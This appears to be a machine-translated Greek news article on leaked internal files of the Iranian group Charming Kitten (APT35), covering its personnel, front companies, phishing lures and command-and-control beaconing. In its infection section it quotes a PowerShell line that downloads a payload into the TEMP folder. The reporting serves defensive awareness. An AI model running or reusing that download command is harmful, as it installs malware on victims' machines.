Νέες διαρροές από τον ιρανικό όμιλο Charming Kitten που υποστηρίζεται από το ιρανικό κράτος, ο οποίος επίσης παρακολουθείται ως APT35, έχουν εκθέσει βασικά στελέχη, εταιρείες προπορευομένων και χιλιάδες παραβιασμένα συστήματα εξαπλωμένα σε πέντε ηπείρους.
Τα εσωτερικά αρχεία δείχνουν ότι το Τμήμα 40 του Ιράν, εντός του Οργανισμού Πληροφοριών του IRGC, διεξάγει μακροχρόνιες εκστρατείες εισβολής που συνδυάζουν την κυβερνοκατασκοπεία με επιχειρήσεις παρακολούθησης και στόχευσης.
Οι κλεμμένοι πίνακες εργαλείων και τα αρχεία μισθοδοσίας συνδέουν πλέον επώνυμους χειριστές με συγκεκριμένη δραστηριότητα hacking και όχι με ανώνυμες ετικέτες απειλών.
Η διαρροή αποκαλύπτει περαιτέρω τη χρηματοοικονομική δομή που υποστηρίζει αυτές τις λειτουργίες, συμπεριλαμβανομένων των δελτίων μισθών για την ομάδα Sisters Team and Brothers, και ροές πληρωμών που διοχετεύονται μέσω εταιρειών που εμφανίζονται ως κανονικοί πάροχοι υπηρεσιών πληροφορικής ή cloud.
Τα παραβιασμένα συστήματα περιλαμβάνουν πύλες VPN, διακομιστές email και κόμβους εντολών και ελέγχου που χρησιμοποιούνται για την καθοδήγηση κακόβουλου λογισμικού που έχει ήδη αναπτυχθεί σε κυβερνητικά γραφεία, πανεπιστήμια και παρόχους τηλεπικοινωνιών.
Το αποτέλεσμα είναι μια σαφής εικόνα του πώς τα χρήματα, η διαχείριση και το κακόβουλο λογισμικό συγκλίνουν σε ένα ενιαίο σύστημα.
Nariman Gharib, ερευνητής ασφάλειας, διάσημος ότι το ίδιο υλικό εκθέτει επίσης φύλλα εργασιών και λίστες στόχων που συνδέουν το κακόβουλο λογισμικό Charming Kitten με συγκεκριμένα διπλωματικά, ενεργειακά δίκτυα και δίκτυα της κοινωνίας των πολιτών.
Το κακόβουλο λογισμικό φθάνει συνήθως μέσω emails spear-phishing, πλαστών σελίδων σύνδεσης ή κακόβουλων συνημμένων εγγράφων που υποδύονται προσκλήσεις σε συσκέψεις, δελτία πληρωμής ή έγγραφα πολιτικής.
Μόλις ένας χρήστης ανοίξει το δέλεαρ και ενεργοποιήσει τα σενάρια ή εισάγει διαπιστευτήρια, οι χειριστές αποκτούν μια αρχική βάση που οδηγεί σε πλήρη έλεγχο της συσκευής και εξαγωγή δεδομένων.
Τα δεδομένα καταγραφής από τους πίνακες εργαλείων που διέρρευσαν δείχνουν φάρους από οικοδεσπότες-θύματα που επιστρέφουν σε διακομιστές που ελέγχονται από το Ιράν μέσω HTTPS σε τακτά χρονικά διαστήματα, συχνά κρυμμένα μέσα σε αυτό που φαίνεται να είναι κανονική κίνηση ιστού.
.webp.jpeg "Το Charming Kitten Leak εκθέτει το βασικό προσωπικό, τις μπροστινές εταιρείες και χιλιάδες υποβαθμισμένα συστήματα")
Αυτοί οι κεντρικοί υπολογιστές βρίσκονται μέσα σε πύλες email, ελεγκτές τομέα και φορητούς υπολογιστές χρηστών, δίνοντας στους χειριστές πρόσβαση σε email, κοινόχρηστα αρχεία και συστήματα ταυτότητας. Η αναφορά που διέρρευσε τονίζει συμπλέγματα μολυσμένων μηχανημάτων ομαδοποιημένα ανά περιοχή και τομέα, υπογραμμίζοντας την εμβέλεια της καμπάνιας.
Μηχανισμός μόλυνσης και εντολή και έλεγχος
Η μόλυνση συχνά ξεκινά με ένα μικρό πρόγραμμα φόρτωσης που τρέχει στη μνήμη αφού ένας χρήστης ανοίξει μια μακροεντολή ή ένα δέλεαρ HTML.
Σύντομες εντολές PowerShell ανακτούν το κύριο ωφέλιμο φορτίο από μια σταθερή αλλά κρυφή διεύθυνση URL, η οποία τώρα τεκμηριώνεται σε μια πλήρη τεχνική ανάλυση των εργαλείων Charming Kitten.
Invoke-WebRequest $u -OutFile "$env:TEMP\\svc.exe"Τα αρχεία καταγραφής από τη διαρροή δείχνουν αυτό το δυαδικό να εκτελείται ως προγραμματισμένη εργασία, παρέχοντας σταθερή πρόσβαση ενώ συνδυάζεται με την κανονική δραστηριότητα των Windows.
Related Posts
Το Tsundere Botnet κάνει κατάχρηση δημοφιλών πακέτων Node.js και κρυπτονομισμάτων για επίθεση σε χρήστες Windows, Linux και macOS
Το MastaStealer οπλίζει τα αρχεία LNK των Windows, εκτελεί την εντολή PowerShell και το Evades Defender
Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής
